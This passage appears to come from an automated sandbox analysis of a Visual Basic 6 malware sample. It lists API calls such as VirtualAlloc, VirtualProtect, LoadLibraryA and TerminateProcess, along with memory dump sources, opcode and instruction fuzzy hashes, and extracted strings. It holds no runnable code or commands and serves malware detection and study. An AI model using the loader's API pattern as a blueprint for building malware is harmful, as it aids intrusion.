                              • Instruction Fuzzy Hash: ED11567180E3C18AD722AF748AB92837F30EF03244F2888DCC8C129057D6558B25EB96
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • LoadLibraryA.KERNELBASE(?,082962C8,?,02BC07A4,?,?), ref: 02BC655D
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: c320bc28e44a79db467188c78bebe4f367506d1dee693f6486bbc1af180728b9
                              • Instruction ID: 6ac7a66c992e634644959a91d02292194459dc3366511008f9224b3a344625bd
                              • Opcode Fuzzy Hash: c320bc28e44a79db467188c78bebe4f367506d1dee693f6486bbc1af180728b9
                              • Instruction Fuzzy Hash: 1CF0E99460434B79DE283A359D40FBD126DCFD16F0F7402ADBF91D10C5CB54C4810952
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,02BC3C09,02BC3DCF,02BC08FD), ref: 02BC3DB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 141e7db9cd5daa0eddf4d8cc7c9e4be8852e2ac8af8df249f857d0db32444c0a
                              • Instruction ID: 34aab1eb95c21221232211500dcfb3e2cbac5798b6738ea48b4009ec304dadf9
                              • Opcode Fuzzy Hash: 141e7db9cd5daa0eddf4d8cc7c9e4be8852e2ac8af8df249f857d0db32444c0a
                              • Instruction Fuzzy Hash: 7DD0C9747A4208BAF6344A109C26FC626565790F00EE04009BB8A6A1C042A099A48519
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000), ref: 02BC35CA
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID:
                              • API String ID: 560597551-0
                              • Opcode ID: 56f51d622dae8d8bb08519e1ea9b4d29d80da5c8b309d41d5fad5c9fa24e959a
                              • Instruction ID: a93aabaa2bac997f5c6e22af22a26bee301b93e6ca7e4a33c26dc332cce598d7
                              • Opcode Fuzzy Hash: 56f51d622dae8d8bb08519e1ea9b4d29d80da5c8b309d41d5fad5c9fa24e959a
                              • Instruction Fuzzy Hash: A6C09B3564414916EF9035304D157D91557EF42AB4FF44311DD7A596C5DB6444844101
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualAlloc.KERNELBASE(00000000,0000D000,00000960,00000040,?,?,0E000000), ref: 00402015
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 4a157fe0f5dc11231ea579531eb9104142c7560f02774cea344c69e691a69b40
                              • Instruction ID: 593102c842c65802f6192f51f31ac743b077a1f9397adfe30fd7ea1a84c27866
                              • Opcode Fuzzy Hash: 4a157fe0f5dc11231ea579531eb9104142c7560f02774cea344c69e691a69b40
                              • Instruction Fuzzy Hash: E1410F2180F202F6DD121560AB0C93E2104AE35B766B186BBDE07B55E11BFE45C777AF
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualAlloc.KERNELBASE(00000000,0000D000,00000960,00000040,?,?,0E000000), ref: 00402015
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: e4f8e8685b65aad2ac4b44da935d166cbe84576090ea95a8e14eee1304803b1e
                              • Instruction ID: 10c72beebc3996f4d7c0951a2a5d698645fd0194b3fa463af6f20507ac75f613
                              • Opcode Fuzzy Hash: e4f8e8685b65aad2ac4b44da935d166cbe84576090ea95a8e14eee1304803b1e
                              • Instruction Fuzzy Hash: 7E41FF2180F212F6CD1215606B0C53A2104AE39B762F186BBDE47B54D12AFE45C7B76F
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualAlloc.KERNELBASE(00000000,0000D000,00000960,00000040,?,?,0E000000), ref: 00402015
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 4c5fa590eef0a0af946562f7bdad10adaed6494a44866bd1c4182baaffc0930f
                              • Instruction ID: b9258f970bb6491953d672739481ef0490bf6f7357d4e05c9125d8efa1ad695e
                              • Opcode Fuzzy Hash: 4c5fa590eef0a0af946562f7bdad10adaed6494a44866bd1c4182baaffc0930f
                              • Instruction Fuzzy Hash: FD41EC2180F212F6CD521560AB0C93A2104AE39B762F186BBDE47B54D12BFE45C7B76F
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualAlloc.KERNELBASE(00000000,0000D000,00000960,00000040,?,?,0E000000), ref: 00402015
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: c0b2c81cb9f380f2a9bff2c6359f11ec5d9fa4169143bcd84287920661059c9f
                              • Instruction ID: 6bf73f7e589d1fed038a5c2de093d71b3bf426a1da07313b0bcca1cd5068a1d9
                              • Opcode Fuzzy Hash: c0b2c81cb9f380f2a9bff2c6359f11ec5d9fa4169143bcd84287920661059c9f
                              • Instruction Fuzzy Hash: 3741FF2180F212F6CD1215606B0C93A2104AE36B762F186BBDE57B54D12BFE45C7776F
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualAlloc.KERNELBASE(00000000,0000D000,00000960,00000040,?,?,0E000000), ref: 00402015
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 4bdb1859347d691220980685f7474bacb1c5d8ce6efe4db437894822c770551b
                              • Instruction ID: 4dd6726646e2e6fa937dcce5fb0dd096f46dd98df63108afb3d1bf9dd830fad8
                              • Opcode Fuzzy Hash: 4bdb1859347d691220980685f7474bacb1c5d8ce6efe4db437894822c770551b
                              • Instruction Fuzzy Hash: 8941332180F202F6CD521570AB0C53A2104AD36B762B186BBDE57B44D12BFE45C3776F
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualAlloc.KERNELBASE(00000000,0000D000,00000960,00000040,?,?,0E000000), ref: 00402015
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 255737c78ff8824170d69e50203997e6984cbcb8ce5a70aa2a0dffafe61cda50
                              • Instruction ID: 107a22687ebc02fe2e34c01baa281640ab30dd7f2d25788542c6eb7b9c260edc
                              • Opcode Fuzzy Hash: 255737c78ff8824170d69e50203997e6984cbcb8ce5a70aa2a0dffafe61cda50
                              • Instruction Fuzzy Hash: 39411F2180F212F6CD121570AB0C43A2204AD39B762F286BBDE17B54D12AFE45C7B76F
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualAlloc.KERNELBASE(00000000,0000D000,00000960,00000040,?,?,0E000000), ref: 00402015
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: e1036e12fb79e3333cf65f32ffcb90ad4b01281dc662eacb538e173bc99e48a4
                              • Instruction ID: 5311603fce5fc1ae07fd3a8b6f90257cc0297bdd332d832edeb936e64d2cb5dd
                              • Opcode Fuzzy Hash: e1036e12fb79e3333cf65f32ffcb90ad4b01281dc662eacb538e173bc99e48a4
                              • Instruction Fuzzy Hash: 3541FF2180F212F6CD121560AB0C93A2104AE39B762F186BBDE17B54D12BFE45C7B76F
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualAlloc.KERNELBASE(00000000,0000D000,00000960,00000040,?,?,0E000000), ref: 00402015
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 23062317f0c372f420513e945c18e6eae881e10a3338722fd3483bee5c829eee
                              • Instruction ID: 998470c8dcf9fb715bdb9b10883fe4db589a2882be30fe60dcb46d5a0bb07350
                              • Opcode Fuzzy Hash: 23062317f0c372f420513e945c18e6eae881e10a3338722fd3483bee5c829eee
                              • Instruction Fuzzy Hash: A941122180F212F6DD521570AB0C53A2104AD39B762B186BBDE57B44C12AFE45C7B76F
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID: D6
                              • API String ID: 0-4158169993
                              • Opcode ID: 5931454ff5058ad91067de5c5d1f090d5abd10521081c213b0c043a28c946f87
                              • Instruction ID: 57fd49e68d8c659a4924f666e4df32a06bc0ecef02347953bf2ad5a85013d0ea
                              • Opcode Fuzzy Hash: 5931454ff5058ad91067de5c5d1f090d5abd10521081c213b0c043a28c946f87
                              • Instruction Fuzzy Hash: 88F082353402008FCB29DB28C5D4F5A73A9EB9D310F61D4A9E95ACB525D234ECC4DE12
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: ae17ac80012485dbcc4104bcb0ba337f03c435d143abfac99538a32f7fa86bd9
                              • Instruction ID: 7dac576f54a97cce3d49fb18425db798c1f06a0358d8ac947ebe4df7f1b1018f
                              • Opcode Fuzzy Hash: ae17ac80012485dbcc4104bcb0ba337f03c435d143abfac99538a32f7fa86bd9
                              • Instruction Fuzzy Hash: 5DC1D371700702AFE7199F28CC90BD9B3E5FF49750F68826DEC9993281D735A895CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: LibraryLoadMemoryProtectVirtual
                              • String ID:
                              • API String ID: 3389902171-0
                              • Opcode ID: e6d0f6f2efa318f8a3358d518349baf8f5ae00725ccaeac4840c5f7069086c70
                              • Instruction ID: 868f8a9e8a242810a495083d17f244c22172ca68ceee8d0edc02d4b8671e1c41
                              • Opcode Fuzzy Hash: e6d0f6f2efa318f8a3358d518349baf8f5ae00725ccaeac4840c5f7069086c70
                              • Instruction Fuzzy Hash: 5DA1F674A043579FDF24DE3884E47A5B696EF56320FE8C2ADC9D64B1D6D7308082DB12
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: LibraryLoadMemoryProtectVirtual
                              • String ID:
                              • API String ID: 3389902171-0
                              • Opcode ID: 0a4b90501593dee0ffe89abe6de72d4a221c204ccaaea6371eac608ac2aa5eae
                              • Instruction ID: 301e90c8159adb5dd6b14e680d151822a028f85b5bbf6b81f8e95bc2812d3fbc
                              • Opcode Fuzzy Hash: 0a4b90501593dee0ffe89abe6de72d4a221c204ccaaea6371eac608ac2aa5eae
                              • Instruction Fuzzy Hash: 0951B5745043578FDB24DF3884A4B95B792EF56320FE8C1AEC9D64B2D6D7348482CB16
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 86096b2e5427876636853da17c8867c98eb346061a13cd3b1cf9cfdac9d3d052
                              • Instruction ID: 38f18d27192dccb10187b7f2c02571055af0caaa605958189cb8739294756419
                              • Opcode Fuzzy Hash: 86096b2e5427876636853da17c8867c98eb346061a13cd3b1cf9cfdac9d3d052
                              • Instruction Fuzzy Hash: 52410370244302AFEB216F28CC98FD97396AF05351FA181EAEC469B1E5D7B09880CA16
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3496e3706d4b485b6582398f058cbed226c52a1665e322193050775100803ad6
                              • Instruction ID: 473f8a5c5b70649da846f4d970d59a920720d9dd51434cee0b1ab35f9fe2676e
                              • Opcode Fuzzy Hash: 3496e3706d4b485b6582398f058cbed226c52a1665e322193050775100803ad6
                              • Instruction Fuzzy Hash: 3751A37A2046CAEAC727AFAAD55930477A2EF1370CF6490D9D0504B463D336D566CBC3
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 90cc62e8a8a6484b6db378f37111415446250ccf05b386e07f91c604432b4b90
                              • Instruction ID: 6aac91afc8aaa033922c017cb08f5f5d1dea701be124029251da153537f738ea
                              • Opcode Fuzzy Hash: 90cc62e8a8a6484b6db378f37111415446250ccf05b386e07f91c604432b4b90
                              • Instruction Fuzzy Hash: 3CD0A72970864B07E725892CC5E438D9043E7E9750FE0C179A145D7249EA698C858600
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f2cb654a9b0b2782f621f16b1a83db542ad4fda8277aa33473bb218577a552da
                              • Instruction ID: 66b8a81386a9af0db286cd8b14c038e01cc3e50c01cb24c8fe326fc7f343b3ba
                              • Opcode Fuzzy Hash: f2cb654a9b0b2782f621f16b1a83db542ad4fda8277aa33473bb218577a552da
                              • Instruction Fuzzy Hash: 7BC048B67456818BFB06DA08DA81B4473E6BB48748B5844E4E842CB755D328E940CA00
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4b9894f3554b378e4cbf1ddfe60e16daa74b8ab6d401b2842865706553bc6542
                              • Instruction ID: 88708c079357b09064db37eda969713abd5c47a9ccaa62c37e19407942ad16cf
                              • Opcode Fuzzy Hash: 4b9894f3554b378e4cbf1ddfe60e16daa74b8ab6d401b2842865706553bc6542
                              • Instruction Fuzzy Hash: 35B092383216808FCB61CF18C1C0F84B3B2BB00B80FE144D0F401DB951C764EC408B00
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __vbaVarDup.MSVBVM60 ref: 00410D00
                              • #628.MSVBVM60(FGFG,00000001,?), ref: 00410D1C
                              • __vbaStrMove.MSVBVM60 ref: 00410D27
                              • __vbaStrCmp.MSVBVM60(0040C464,00000000), ref: 00410D33
                              • __vbaFreeStr.MSVBVM60 ref: 00410D46
                              • __vbaFreeVar.MSVBVM60 ref: 00410D4F
                              • __vbaNew2.MSVBVM60(0040C6EC,Xs), ref: 00410D71
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410D8A
                              • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C400,00000160), ref: 00410DB1
                              • _adj_fdiv_m64.MSVBVM60 ref: 00410DDD
                              • __vbaFpI4.MSVBVM60(43540000,?,43520000), ref: 00410E08
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BE78,000002C0,?,43520000), ref: 00410E41
                              • __vbaFreeObj.MSVBVM60(?,43520000), ref: 00410E4A
                              • __vbaFreeVar.MSVBVM60(00410E7E), ref: 00410E77
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$Free$CheckHresult$#628MoveNew2_adj_fdiv_m64
                              • String ID: FGFG$Xs
                              • API String ID: 3842582943-3903072984
                              • Opcode ID: 5cdf4f7aa4bab04db8c6e0c23bb876003ede648bbddc308957fda3565e09b4fd
                              • Instruction ID: 093d746ca1beb0e40c0a7d72c9ebd4a8ae905701a5bb8c22c8cbfacd13d34702
                              • Opcode Fuzzy Hash: 5cdf4f7aa4bab04db8c6e0c23bb876003ede648bbddc308957fda3565e09b4fd
                              • Instruction Fuzzy Hash: 6C414C71940208EFDB00DFA0ED89EEEBBB8FB58701F10456AF446B65A0D7745985CBA8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __vbaI4Str.MSVBVM60(0040C4EC), ref: 00411BB1
                              • #608.MSVBVM60(?,00000000), ref: 00411BBC
                              • __vbaVarTstNe.MSVBVM60(?,?), ref: 00411BD8
                              • __vbaFreeVar.MSVBVM60 ref: 00411BE4
                              • __vbaNew2.MSVBVM60(0040C430,00413338), ref: 00411C05
                              • __vbaHresultCheckObj.MSVBVM60(00000000,02B0E8CC,0040C420,0000001C), ref: 00411C2A
                              • __vbaNew2.MSVBVM60(0040C6EC,Xs), ref: 00411C54
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411C6D
                              • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C2D0,000000C8), ref: 00411C94
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040C2A8,00000060), ref: 00411CCF
                              • __vbaFreeStr.MSVBVM60 ref: 00411CD8
                              • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00411CE8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$CheckFreeHresult$New2$#608List
                              • String ID: Xs
                              • API String ID: 2089189435-372796199
                              • Opcode ID: 659d66c965104f53d4b8aff3c92df3738a224c8845931493a569beb9731aa454
                              • Instruction ID: ba91b5a22035b1221881042807dc12a98ba8536124ff2b7386bd0a3c153fbe2e
                              • Opcode Fuzzy Hash: 659d66c965104f53d4b8aff3c92df3738a224c8845931493a569beb9731aa454
                              • Instruction Fuzzy Hash: 44514F74941249EFCB10DF94DA89EEEBBB8FB08701F10816EF506B72A0D7785949CB58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __vbaVarDup.MSVBVM60 ref: 004119DF
                              • __vbaNew2.MSVBVM60(0040C6EC,Xs), ref: 004119F8
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411A11
                              • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C220,00000098), ref: 00411A38
                              • __vbaVarErrI4.MSVBVM60(?,?), ref: 00411A47
                              • #559.MSVBVM60(00000000), ref: 00411A4E
                              • __vbaFreeObj.MSVBVM60 ref: 00411A64
                              • __vbaFreeVar.MSVBVM60 ref: 00411A6D
                              • _adj_fdiv_m64.MSVBVM60 ref: 00411AA1
                              • __vbaFpI4.MSVBVM60(42C60000,?,434C0000), ref: 00411ACA
                              • __vbaHresultCheckObj.MSVBVM60(00000000,004012E8,0040BE78,000002C0,?,434C0000), ref: 00411AFE
                              • __vbaFreeVar.MSVBVM60(00411B20), ref: 00411B19
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$Free$CheckHresult$#559New2_adj_fdiv_m64
                              • String ID: Xs
                              • API String ID: 2205265000-372796199
                              • Opcode ID: 5893cf91ef0c402c3b6b507d2bb24c4761498f53c068710e4455f6b736da4c57
                              • Instruction ID: cfc31587479a2b37b5b9cab80607fe22404b2ed885f496ad5160353065e4b232
                              • Opcode Fuzzy Hash: 5893cf91ef0c402c3b6b507d2bb24c4761498f53c068710e4455f6b736da4c57
                              • Instruction Fuzzy Hash: 52417B70900245EBCB10DFA4DD88EEEBBB8FF48741F10856EF546B25A0D7386985CB58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$Free$#513#568CopyList
                              • String ID:
                              • API String ID: 64076409-0
                              • Opcode ID: 44fe875feb4c02afd4ca720c18ce635559e161022008ce4a285e875b8da64697
                              • Instruction ID: 1f1893001a5af6aa49567691b2b395c5e626477f8212ca2baeeededcd327da5f
                              • Opcode Fuzzy Hash: 44fe875feb4c02afd4ca720c18ce635559e161022008ce4a285e875b8da64697
                              • Instruction Fuzzy Hash: 233104B1C0021DDBCB10DF94D985ADDBBB8FF48704F00815AE55AB7264DBB42A4ACFA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __vbaVarDup.MSVBVM60 ref: 004114D6
                              • #671.MSVBVM60(00000000,00000000,00000000,40000000,00000000,40000000), ref: 004114EA
                              • __vbaFpR8.MSVBVM60 ref: 004114F0
                              • __vbaNew2.MSVBVM60(0040C6EC,Xs), ref: 0041151A
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411533
                              • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C1E4,00000060), ref: 00411554
                              • __vbaHresultCheckObj.MSVBVM60(00000000,00401280,0040BE78,00000084), ref: 00411594
                              • __vbaFreeObj.MSVBVM60 ref: 0041159D
                              • __vbaFreeVar.MSVBVM60(004115BF), ref: 004115B8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$CheckFreeHresult$#671New2
                              • String ID: Xs
                              • API String ID: 4049541443-372796199
                              • Opcode ID: 73bcbe974962e1ae1e79b2cb4d2cee651bb4f5a86f4de7ba214234eddb9b0f6b
                              • Instruction ID: 2d5a380156fd8f89c0864547aa3dbd65d3f9fb6378abbf669dc0730c2745e642
                              • Opcode Fuzzy Hash: 73bcbe974962e1ae1e79b2cb4d2cee651bb4f5a86f4de7ba214234eddb9b0f6b
                              • Instruction Fuzzy Hash: 89318F70900208EBCB009FA5DE89FDEBBB8FB48705F10856AF546B21A0D7345985CF69
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __vbaVarDup.MSVBVM60 ref: 004111DC
                              • __vbaVarDup.MSVBVM60 ref: 004111F2
                              • #558.MSVBVM60(?), ref: 004111F8
                              • __vbaFreeVar.MSVBVM60 ref: 0041120F
                              • __vbaNew2.MSVBVM60(0040C430,00413338), ref: 0041122C
                              • __vbaHresultCheckObj.MSVBVM60(00000000,02B0E8CC,0040C420,00000034), ref: 0041127C
                              • __vbaObjSet.MSVBVM60(?,?), ref: 0041128D
                              • __vbaFreeObj.MSVBVM60(004112C1), ref: 004112B1
                              • __vbaFreeVar.MSVBVM60 ref: 004112BA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$Free$#558CheckHresultNew2
                              • String ID: PORPHYRY
                              • API String ID: 3535509826-1558576227
                              • Opcode ID: d609becf9e89978e7bc363c5d9c2fc61c07ef93f7b6951d34eb425f43fcd2d51
                              • Instruction ID: d8154db5369cdc37ccb21bd4bad5315eca1b4abec945426c7a85ad7eb729151d
                              • Opcode Fuzzy Hash: d609becf9e89978e7bc363c5d9c2fc61c07ef93f7b6951d34eb425f43fcd2d51
                              • Instruction Fuzzy Hash: AB315BB1C40258DBCB00DF98DD89AEDBBB8FF58704F10811AE901B7664D7741949CB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __vbaVarDup.MSVBVM60 ref: 0041135D
                              • __vbaUI1Str.MSVBVM60(0040C498), ref: 00411364
                              • __vbaVarDup.MSVBVM60 ref: 004113C6
                              • #596.MSVBVM60(?,?,?,?,?,?,?), ref: 004113EA
                              • __vbaStrMove.MSVBVM60 ref: 004113F5
                              • __vbaFreeVarList.MSVBVM60(00000007,?,?,?,?,?,?,?), ref: 0041141F
                              • __vbaFreeStr.MSVBVM60(00411470), ref: 00411460
                              • __vbaFreeVar.MSVBVM60 ref: 00411469
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: __vba$Free$#596ListMove
                              • String ID: energies
